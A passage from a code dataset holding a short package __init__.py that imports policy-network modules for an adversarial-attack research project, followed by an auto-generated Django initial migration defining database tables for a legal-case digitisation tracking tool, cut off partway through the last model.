35667d9961e71bf16d505395acb0f8eb55e0f2af | 339 | py | Python | policy_driven_attack/policy/cifar/__init__.py | machanic/TangentAttack | 17c1a8e93f9bbd03e209e8650631af744a0ff6b8 | ["Apache-2.0"]
from policy_driven_attack.policy.cifar.empty import *
from policy_driven_attack.policy.cifar.unet import *
from policy_driven_attack.policy.cifar.carlinet_inv import *
from policy_driven_attack.policy.cifar.vgg_inv import *
from policy_driven_attack.policy.cifar.resnet_inv import *
from policy_driven_attack.policy.cifar.wrn_inv import *
358fdb97bfe60e02d046b254b90d7abddbb51a78 | 54,195 | py | Python | capstone/tracking_tool/migrations/0001_initial.py | jcushman/capstone | ef3ced77f69aabe14c89ab67003a6e88736bf777 | ["MIT"]
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-06-23 19:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Batches',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('notes', models.TextField(blank=True, null=True)),
('created_by', models.IntegerField()),
('sent', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField()),
],
options={
'db_table': 'batches',
},
),
migrations.CreateModel(
name='BookRequests',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('updated_by', models.IntegerField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('recipients', models.CharField(blank=True, max_length=512, null=True)),
('from_field', models.CharField(blank=True, db_column='from', max_length=128, null=True)),
('mail_body', models.TextField(blank=True, null=True)),
('note', models.TextField(blank=True, null=True)),
('send_date', models.DateField(blank=True, null=True)),
('label', models.CharField(blank=True, max_length=32, null=True)),
('sent_at', models.DateTimeField(blank=True, null=True)),
('subject', models.CharField(blank=True, max_length=512, null=True)),
('delivery_date', models.DateField(blank=True, null=True)),
],
options={
'db_table': 'book_requests',
},
),
migrations.CreateModel(
name='Casepages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bar_code', models.CharField(max_length=64)),
('case_id', models.IntegerField()),
('seqid', models.CharField(max_length=12)),
('caseno', models.CharField(max_length=12)),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
],
options={
'db_table': 'casepages',
},
),
migrations.CreateModel(
name='Cases',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bar_code', models.CharField(max_length=64)),
('redacted_mets_xml', models.CharField(blank=True, max_length=256, null=True)),
('unredacted_mets_xml', models.CharField(blank=True, max_length=256, null=True)),
('bucket', models.CharField(max_length=32)),
('caseno', models.CharField(blank=True, max_length=12, null=True)),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('unredacted_xml_invalid', models.CharField(blank=True, max_length=256, null=True)),
('redacted_xml_invalid', models.CharField(blank=True, max_length=256, null=True)),
('version', models.DateTimeField(blank=True, null=True)),
('unredacted_mets_xml_md5', models.CharField(blank=True, max_length=32, null=True)),
('redacted_mets_xml_md5', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 'cases',
},
),
migrations.CreateModel(
name='Eventloggers',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bar_code', models.CharField(max_length=64)),
('type', models.CharField(max_length=128)),
('location', models.CharField(blank=True, max_length=24, null=True)),
('destination', models.CharField(blank=True, max_length=128, null=True)),
('origination', models.CharField(blank=True, max_length=128, null=True)),
('notes', models.TextField(blank=True, null=True)),
('created_by', models.IntegerField()),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField()),
('pstep_id', models.CharField(blank=True, max_length=48, null=True)),
('exception', models.IntegerField(blank=True, null=True)),
('warning', models.IntegerField(blank=True, null=True)),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 'eventloggers',
},
),
migrations.CreateModel(
name='Holdingsbooks',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tray', models.CharField(max_length=9)),
('barcode', models.CharField(max_length=16, unique=True)),
('hollis_no', models.CharField(blank=True, max_length=12, null=True)),
('title', models.CharField(blank=True, max_length=512, null=True)),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField(blank=True, null=True)),
('requested', models.IntegerField(blank=True, null=True)),
('inscope', models.IntegerField(blank=True, null=True)),
('volume', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'holdingsbooks',
},
),
migrations.CreateModel(
name='Holdingstrays',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tray', models.CharField(max_length=9)),
('aisle', models.IntegerField()),
('ladder', models.IntegerField()),
('position', models.IntegerField()),
('side', models.CharField(max_length=1)),
],
options={
'db_table': 'holdingstrays',
},
),
migrations.CreateModel(
name='Hollis',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('hollis_no', models.CharField(blank=True, max_length=9, null=True)),
('reporter_id', models.IntegerField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField(blank=True, null=True)),
],
options={
'db_table': 'hollis',
},
),
migrations.CreateModel(
name='InnodataCaseImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('case_id', models.IntegerField()),
('barcode', models.CharField(max_length=15)),
('bucket', models.CharField(blank=True, max_length=48, null=True)),
('s3key', models.CharField(max_length=255)),
('cases3key', models.CharField(max_length=255)),
('caseno', models.SmallIntegerField(db_column='caseNo')),
('docno', models.SmallIntegerField(db_column='docNo')),
('pageside', models.IntegerField(db_column='pageSide')),
('fileformat', models.CharField(db_column='fileFormat', max_length=3)),
('seqno', models.SmallIntegerField(db_column='seqNo')),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
],
options={
'db_table': 'innodata_case_images',
},
),
migrations.CreateModel(
name='InnodataPrivateCaseImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('case_id', models.IntegerField()),
('barcode', models.CharField(max_length=15)),
('bucket', models.CharField(blank=True, max_length=48, null=True)),
('s3key', models.CharField(max_length=255)),
('cases3key', models.CharField(max_length=255)),
('caseno', models.SmallIntegerField(db_column='caseNo')),
('docno', models.SmallIntegerField(db_column='docNo')),
('pageside', models.IntegerField(db_column='pageSide')),
('fileformat', models.CharField(db_column='fileFormat', max_length=3)),
('seqno', models.SmallIntegerField(db_column='seqNo')),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
],
options={
'db_table': 'innodata_private_case_images',
},
),
migrations.CreateModel(
name='InnodataPrivateCases',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('barcode', models.CharField(max_length=15)),
('s3key', models.CharField(max_length=255, unique=True)),
('etag', models.CharField(db_column='eTag', max_length=32)),
('caseno', models.SmallIntegerField(db_column='caseNo')),
('redacted', models.IntegerField()),
('deleted', models.IntegerField()),
('version_id', models.CharField(blank=True, max_length=48, null=True)),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('key_created', models.DateTimeField(blank=True, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('bucket', models.CharField(blank=True, max_length=32, null=True)),
('court_count', models.IntegerField()),
('caseabbrev_count', models.IntegerField()),
('docketnumber_count', models.IntegerField()),
('citation_count', models.IntegerField()),
('decisiondate_count', models.IntegerField()),
('otherdate_count', models.IntegerField()),
('publicationstatus_count', models.IntegerField()),
('parties_count', models.IntegerField()),
('judges_count', models.IntegerField()),
('attorneys_count', models.IntegerField()),
('opinion_count', models.IntegerField()),
('author_count', models.IntegerField()),
('p_count', models.IntegerField()),
('blockquote_count', models.IntegerField()),
('opiniontype_count', models.IntegerField()),
('pagelabel_count', models.IntegerField()),
('footnote_count', models.IntegerField()),
('footnotemark_count', models.IntegerField()),
('summary_count', models.IntegerField()),
('syllabus_count', models.IntegerField()),
('disposition_count', models.IntegerField()),
('history_count', models.IntegerField()),
('headnotes_count', models.IntegerField()),
('bracketnum_count', models.IntegerField()),
('key_count', models.IntegerField()),
('xml_version', models.IntegerField()),
('unknown_tags', models.CharField(blank=True, max_length=256, null=True)),
('casename_count', models.IntegerField()),
('qastatus', models.IntegerField(blank=True, null=True)),
('qanotes', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'innodata_private_cases',
},
),
migrations.CreateModel(
name='InnodataPrivateImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('barcode', models.CharField(max_length=15)),
('s3key', models.CharField(max_length=255, unique=True)),
('etag', models.CharField(db_column='eTag', max_length=32)),
('docno', models.SmallIntegerField(db_column='docNo')),
('pageside', models.IntegerField(db_column='pageSide')),
('fileformat', models.CharField(db_column='fileFormat', max_length=3)),
('seqno', models.SmallIntegerField(db_column='seqNo')),
('redacted', models.IntegerField()),
('deleted', models.IntegerField()),
('version_id', models.CharField(blank=True, max_length=48, null=True)),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('key_created', models.DateTimeField(blank=True, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('bucket', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 'innodata_private_images',
},
),
migrations.CreateModel(
name='InnodataPrivateVolumes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('barcode', models.CharField(max_length=15)),
('s3key', models.CharField(max_length=255, unique=True)),
('etag', models.CharField(db_column='eTag', max_length=32)),
('fileformat', models.CharField(db_column='fileFormat', max_length=3)),
('redacted', models.IntegerField()),
('deleted', models.IntegerField()),
('version_id', models.CharField(blank=True, max_length=48, null=True)),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('key_created', models.DateTimeField(blank=True, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('bucket', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 'innodata_private_volumes',
},
),
migrations.CreateModel(
name='InnodataSharedCaseImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('case_id', models.IntegerField()),
('barcode', models.CharField(max_length=15)),
('bucket', models.CharField(blank=True, max_length=48, null=True)),
('s3key', models.CharField(max_length=255)),
('cases3key', models.CharField(max_length=255)),
('caseno', models.SmallIntegerField(db_column='caseNo')),
('docno', models.SmallIntegerField(db_column='docNo')),
('pageside', models.IntegerField(db_column='pageSide')),
('fileformat', models.CharField(db_column='fileFormat', max_length=3)),
('seqno', models.SmallIntegerField(db_column='seqNo')),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
],
options={
'db_table': 'innodata_shared_case_images',
},
),
migrations.CreateModel(
name='InnodataSharedCases',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('barcode', models.CharField(max_length=15)),
('s3key', models.CharField(max_length=255, unique=True)),
('etag', models.CharField(db_column='eTag', max_length=32)),
('caseno', models.SmallIntegerField(db_column='caseNo')),
('redacted', models.IntegerField()),
('deleted', models.IntegerField()),
('version_id', models.CharField(blank=True, max_length=48, null=True)),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('key_created', models.DateTimeField(blank=True, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('bucket', models.CharField(blank=True, max_length=32, null=True)),
('court_count', models.IntegerField()),
('casename_count', models.IntegerField()),
('caseabbrev_count', models.IntegerField()),
('docketnumber_count', models.IntegerField()),
('citation_count', models.IntegerField()),
('decisiondate_count', models.IntegerField()),
('otherdate_count', models.IntegerField()),
('publicationstatus_count', models.IntegerField()),
('parties_count', models.IntegerField()),
('judges_count', models.IntegerField()),
('attorneys_count', models.IntegerField()),
('opinion_count', models.IntegerField()),
('author_count', models.IntegerField()),
('p_count', models.IntegerField()),
('blockquote_count', models.IntegerField()),
('opiniontype_count', models.IntegerField()),
('pagelabel_count', models.IntegerField()),
('footnote_count', models.IntegerField()),
('footnotemark_count', models.IntegerField()),
('summary_count', models.IntegerField()),
('syllabus_count', models.IntegerField()),
('disposition_count', models.IntegerField()),
('history_count', models.IntegerField()),
('headnotes_count', models.IntegerField()),
('bracketnum_count', models.IntegerField()),
('key_count', models.IntegerField()),
('xml_version', models.IntegerField()),
('unknown_tags', models.CharField(blank=True, max_length=256, null=True)),
('qastatus', models.IntegerField(blank=True, null=True)),
('qanotes', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'innodata_shared_cases',
},
),
migrations.CreateModel(
name='InnodataSharedImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('barcode', models.CharField(max_length=15)),
('s3key', models.CharField(max_length=255, unique=True)),
('etag', models.CharField(db_column='eTag', max_length=32)),
('docno', models.SmallIntegerField(db_column='docNo')),
('pageside', models.IntegerField(db_column='pageSide')),
('fileformat', models.CharField(db_column='fileFormat', max_length=3)),
('seqno', models.SmallIntegerField(db_column='seqNo')),
('redacted', models.IntegerField()),
('deleted', models.IntegerField()),
('version_id', models.CharField(blank=True, max_length=48, null=True)),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('key_created', models.DateTimeField(blank=True, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('bucket', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 'innodata_shared_images',
},
),
migrations.CreateModel(
name='InnodataSharedVolumes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('barcode', models.CharField(max_length=15)),
('s3key', models.CharField(max_length=255, unique=True)),
('etag', models.CharField(db_column='eTag', max_length=32)),
('fileformat', models.CharField(db_column='fileFormat', max_length=3)),
('redacted', models.IntegerField()),
('deleted', models.IntegerField()),
('version_id', models.CharField(blank=True, max_length=48, null=True)),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('key_created', models.DateTimeField(blank=True, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('bucket', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 'innodata_shared_volumes',
},
),
migrations.CreateModel(
name='Migrations',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('migration', models.CharField(max_length=255)),
('batch', models.IntegerField()),
],
options={
'db_table': 'migrations',
},
),
migrations.CreateModel(
name='Pages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bar_code', models.CharField(max_length=64)),
('redacted_tiff', models.CharField(blank=True, max_length=256, null=True)),
('unredacted_tiff', models.CharField(blank=True, max_length=256, null=True)),
('redacted_jp2', models.CharField(blank=True, max_length=256, null=True)),
('unredacted_jp2', models.CharField(blank=True, max_length=256, null=True)),
('redacted_alto_xml', models.CharField(blank=True, max_length=256, null=True)),
('unredacted_alto_xml', models.CharField(blank=True, max_length=256, null=True)),
('bucket', models.CharField(max_length=32)),
('seqid', models.CharField(max_length=12)),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('version', models.DateTimeField(blank=True, null=True)),
('unredacted_alto_xml_md5', models.CharField(blank=True, max_length=32, null=True)),
('redacted_alto_xml_md5', models.CharField(blank=True, max_length=32, null=True)),
('unredacted_jp2_md5', models.CharField(blank=True, max_length=32, null=True)),
('redacted_jp2_md5', models.CharField(blank=True, max_length=32, null=True)),
('unredacted_tiff_md5', models.CharField(blank=True, max_length=32, null=True)),
('redacted_tiff_md5', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 'pages',
},
),
migrations.CreateModel(
name='Preferences',
fields=[
('id', models.CharField(max_length=30, primary_key=True, serialize=False)),
('name', models.CharField(max_length=50)),
('category', models.CharField(max_length=30)),
('privlevel', models.CharField(max_length=30)),
('value', models.TextField(blank=True, null=True)),
('default_value', models.CharField(blank=True, max_length=512, null=True)),
('updated_by', models.IntegerField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
],
options={
'db_table': 'preferences',
},
),
migrations.CreateModel(
name='PrivateReporterTagStats',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField()),
('reporter_id', models.IntegerField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('case_count', models.IntegerField(blank=True, null=True)),
('case_missing_count', models.IntegerField(blank=True, null=True)),
('court_count', models.IntegerField(blank=True, null=True)),
('casename_count', models.IntegerField(blank=True, null=True)),
('caseabbrev_count', models.IntegerField(blank=True, null=True)),
('docketnumber_count', models.IntegerField(blank=True, null=True)),
('citation_count', models.IntegerField(blank=True, null=True)),
('decisiondate_count', models.IntegerField(blank=True, null=True)),
('otherdate_count', models.IntegerField(blank=True, null=True)),
('publicationstatus_count', models.IntegerField(blank=True, null=True)),
('parties_count', models.IntegerField(blank=True, null=True)),
('judges_count', models.IntegerField(blank=True, null=True)),
('attorneys_count', models.IntegerField(blank=True, null=True)),
('opinion_count', models.IntegerField(blank=True, null=True)),
('author_count', models.IntegerField(blank=True, null=True)),
('p_count', models.IntegerField(blank=True, null=True)),
('blockquote_count', models.IntegerField(blank=True, null=True)),
('opiniontype_count', models.IntegerField(blank=True, null=True)),
('pagelabel_count', models.IntegerField(blank=True, null=True)),
('footnote_count', models.IntegerField(blank=True, null=True)),
('footnotemark_count', models.IntegerField(blank=True, null=True)),
('summary_count', models.IntegerField(blank=True, null=True)),
('syllabus_count', models.IntegerField(blank=True, null=True)),
('disposition_count', models.IntegerField(blank=True, null=True)),
('history_count', models.IntegerField(blank=True, null=True)),
('headnotes_count', models.IntegerField(blank=True, null=True)),
('bracketnum_count', models.IntegerField(blank=True, null=True)),
('key_count', models.IntegerField(blank=True, null=True)),
('unknown_tags', models.IntegerField(blank=True, null=True)),
('qastatus', models.IntegerField(blank=True, null=True)),
('qanotes', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'private_reporter_tag_stats',
},
),
migrations.CreateModel(
name='PrivateVolumeTagStats',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField()),
('reporter_id', models.IntegerField(blank=True, null=True)),
('bar_code', models.CharField(blank=True, max_length=64, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('case_count', models.IntegerField(blank=True, null=True)),
('case_missing_count', models.IntegerField(blank=True, null=True)),
('court_count', models.IntegerField(blank=True, null=True)),
('casename_count', models.IntegerField(blank=True, null=True)),
('caseabbrev_count', models.IntegerField(blank=True, null=True)),
('docketnumber_count', models.IntegerField(blank=True, null=True)),
('citation_count', models.IntegerField(blank=True, null=True)),
('decisiondate_count', models.IntegerField(blank=True, null=True)),
('otherdate_count', models.IntegerField(blank=True, null=True)),
('publicationstatus_count', models.IntegerField(blank=True, null=True)),
('parties_count', models.IntegerField(blank=True, null=True)),
('judges_count', models.IntegerField(blank=True, null=True)),
('attorneys_count', models.IntegerField(blank=True, null=True)),
('opinion_count', models.IntegerField(blank=True, null=True)),
('author_count', models.IntegerField(blank=True, null=True)),
('p_count', models.IntegerField(blank=True, null=True)),
('blockquote_count', models.IntegerField(blank=True, null=True)),
('opiniontype_count', models.IntegerField(blank=True, null=True)),
('pagelabel_count', models.IntegerField(blank=True, null=True)),
('footnote_count', models.IntegerField(blank=True, null=True)),
('footnotemark_count', models.IntegerField(blank=True, null=True)),
('summary_count', models.IntegerField(blank=True, null=True)),
('syllabus_count', models.IntegerField(blank=True, null=True)),
('disposition_count', models.IntegerField(blank=True, null=True)),
('history_count', models.IntegerField(blank=True, null=True)),
('headnotes_count', models.IntegerField(blank=True, null=True)),
('bracketnum_count', models.IntegerField(blank=True, null=True)),
('key_count', models.IntegerField(blank=True, null=True)),
('unknown_tags', models.IntegerField(blank=True, null=True)),
('volume', models.IntegerField(blank=True, null=True)),
('publicationyear', models.IntegerField(blank=True, null=True)),
('qastatus', models.IntegerField(blank=True, null=True)),
('qanotes', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'private_volume_tag_stats',
},
),
migrations.CreateModel(
name='Projects',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=24)),
('notes', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'projects',
},
),
migrations.CreateModel(
name='ProjectVolume',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bar_code', models.CharField(max_length=64)),
('project_id', models.CharField(max_length=24)),
],
options={
'db_table': 'project_volume',
},
),
migrations.CreateModel(
name='Pstep',
fields=[
('step_id', models.CharField(max_length=255, primary_key=True, serialize=False, unique=True)),
('type', models.CharField(blank=True, max_length=1, null=True)),
('name', models.CharField(blank=True, max_length=24, null=True)),
('prereq', models.CharField(blank=True, max_length=1024, null=True)),
('desc', models.CharField(max_length=256)),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField()),
],
options={
'db_table': 'pstep',
},
),
migrations.CreateModel(
name='Reporters',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('state', models.CharField(blank=True, max_length=64, null=True)),
('reporter', models.CharField(max_length=256)),
('short', models.CharField(max_length=64)),
('start_date', models.IntegerField(blank=True, null=True)),
('end_date', models.IntegerField(blank=True, null=True)),
('volumes', models.IntegerField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField()),
('notes', models.TextField(blank=True, null=True)),
('original_volumes', models.IntegerField(blank=True, null=True)),
('original_start_date', models.CharField(blank=True, max_length=4, null=True)),
('original_end_date', models.CharField(blank=True, max_length=4, null=True)),
('observed_start_date', models.IntegerField(blank=True, null=True)),
('observed_end_date', models.IntegerField(blank=True, null=True)),
('observed_volumes', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'reporters',
},
),
migrations.CreateModel(
name='S3KeyErrors',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bucket', models.CharField(blank=True, max_length=48, null=True)),
('error_type', models.CharField(blank=True, max_length=12, null=True)),
('error_text', models.TextField(blank=True, null=True)),
('key_created', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('modified_at', models.DateTimeField(blank=True, null=True)),
],
options={
'db_table': 's3_key_errors',
},
),
migrations.CreateModel(
name='S3ScannerOutput',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('barcode', models.CharField(max_length=15)),
('s3key', models.CharField(max_length=90, unique=True)),
('etag', models.CharField(db_column='eTag', max_length=32)),
('fileformat', models.CharField(db_column='fileFormat', max_length=3)),
('version_id', models.CharField(blank=True, max_length=48, null=True)),
('docno', models.SmallIntegerField(blank=True, db_column='docNo', null=True)),
('pageside', models.IntegerField(blank=True, db_column='pageSide', null=True)),
('seqno', models.SmallIntegerField(blank=True, db_column='seqNo', null=True)),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('created_at', models.DateTimeField(blank=True, null=True)),
('bucket', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 's3_scanner_output',
},
),
migrations.CreateModel(
name='ServerStats',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fqdn', models.CharField(max_length=256)),
('ip', models.CharField(max_length=16)),
('type', models.CharField(max_length=8)),
('qcwait', models.IntegerField(blank=True, null=True)),
('xferwait', models.IntegerField(blank=True, null=True)),
('pswait', models.IntegerField(blank=True, null=True)),
('df', models.IntegerField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField()),
],
options={
'db_table': 'server_stats',
},
),
migrations.CreateModel(
name='SharedReporterTagStats',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField()),
('reporter_id', models.IntegerField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('case_count', models.IntegerField(blank=True, null=True)),
('case_missing_count', models.IntegerField(blank=True, null=True)),
('court_count', models.IntegerField(blank=True, null=True)),
('casename_count', models.IntegerField(blank=True, null=True)),
('caseabbrev_count', models.IntegerField(blank=True, null=True)),
('docketnumber_count', models.IntegerField(blank=True, null=True)),
('citation_count', models.IntegerField(blank=True, null=True)),
('decisiondate_count', models.IntegerField(blank=True, null=True)),
('otherdate_count', models.IntegerField(blank=True, null=True)),
('publicationstatus_count', models.IntegerField(blank=True, null=True)),
('parties_count', models.IntegerField(blank=True, null=True)),
('judges_count', models.IntegerField(blank=True, null=True)),
('attorneys_count', models.IntegerField(blank=True, null=True)),
('opinion_count', models.IntegerField(blank=True, null=True)),
('author_count', models.IntegerField(blank=True, null=True)),
('p_count', models.IntegerField(blank=True, null=True)),
('blockquote_count', models.IntegerField(blank=True, null=True)),
('opiniontype_count', models.IntegerField(blank=True, null=True)),
('pagelabel_count', models.IntegerField(blank=True, null=True)),
('footnote_count', models.IntegerField(blank=True, null=True)),
('footnotemark_count', models.IntegerField(blank=True, null=True)),
('summary_count', models.IntegerField(blank=True, null=True)),
('syllabus_count', models.IntegerField(blank=True, null=True)),
('disposition_count', models.IntegerField(blank=True, null=True)),
('history_count', models.IntegerField(blank=True, null=True)),
('headnotes_count', models.IntegerField(blank=True, null=True)),
('bracketnum_count', models.IntegerField(blank=True, null=True)),
('key_count', models.IntegerField(blank=True, null=True)),
('unknown_tags', models.IntegerField(blank=True, null=True)),
('qastatus', models.IntegerField(blank=True, null=True)),
('qanotes', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'shared_reporter_tag_stats',
},
),
migrations.CreateModel(
name='SharedVolumeTagStats',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField()),
('reporter_id', models.IntegerField(blank=True, null=True)),
('bar_code', models.CharField(blank=True, max_length=64, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('case_count', models.IntegerField(blank=True, null=True)),
('case_missing_count', models.IntegerField(blank=True, null=True)),
('court_count', models.IntegerField(blank=True, null=True)),
('casename_count', models.IntegerField(blank=True, null=True)),
('caseabbrev_count', models.IntegerField(blank=True, null=True)),
('docketnumber_count', models.IntegerField(blank=True, null=True)),
('citation_count', models.IntegerField(blank=True, null=True)),
('decisiondate_count', models.IntegerField(blank=True, null=True)),
('otherdate_count', models.IntegerField(blank=True, null=True)),
('publicationstatus_count', models.IntegerField(blank=True, null=True)),
('parties_count', models.IntegerField(blank=True, null=True)),
('judges_count', models.IntegerField(blank=True, null=True)),
('attorneys_count', models.IntegerField(blank=True, null=True)),
('opinion_count', models.IntegerField(blank=True, null=True)),
('author_count', models.IntegerField(blank=True, null=True)),
('p_count', models.IntegerField(blank=True, null=True)),
('blockquote_count', models.IntegerField(blank=True, null=True)),
('opiniontype_count', models.IntegerField(blank=True, null=True)),
('pagelabel_count', models.IntegerField(blank=True, null=True)),
('footnote_count', models.IntegerField(blank=True, null=True)),
('footnotemark_count', models.IntegerField(blank=True, null=True)),
('summary_count', models.IntegerField(blank=True, null=True)),
('syllabus_count', models.IntegerField(blank=True, null=True)),
('disposition_count', models.IntegerField(blank=True, null=True)),
('history_count', models.IntegerField(blank=True, null=True)),
('headnotes_count', models.IntegerField(blank=True, null=True)),
('bracketnum_count', models.IntegerField(blank=True, null=True)),
('key_count', models.IntegerField(blank=True, null=True)),
('unknown_tags', models.IntegerField(blank=True, null=True)),
('volume', models.IntegerField(blank=True, null=True)),
('publicationyear', models.IntegerField(blank=True, null=True)),
('qastatus', models.IntegerField(blank=True, null=True)),
('qanotes', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'shared_volume_tag_stats',
},
),
migrations.CreateModel(
name='Statcache',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=32, null=True)),
('updated_at', models.DateTimeField()),
('created_at', models.DateTimeField(blank=True, null=True)),
('value', models.IntegerField(blank=True, null=True)),
('offset', models.SmallIntegerField(blank=True, null=True)),
('json', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'statcache',
},
),
migrations.CreateModel(
name='Users',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('privlevel', models.CharField(max_length=3)),
('email', models.CharField(max_length=320)),
('password', models.CharField(max_length=64)),
('active', models.IntegerField()),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField()),
('remember_token', models.CharField(blank=True, max_length=100, null=True)),
],
options={
'db_table': 'users',
},
),
migrations.CreateModel(
name='VolumeBackups',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bar_code', models.CharField(max_length=64)),
('hollis_no', models.CharField(max_length=128)),
('volume', models.CharField(blank=True, max_length=64, null=True)),
('publicationdate', models.DateField(blank=True, null=True)),
('publisher', models.CharField(blank=True, max_length=255, null=True)),
('publicationyear', models.IntegerField(blank=True, null=True)),
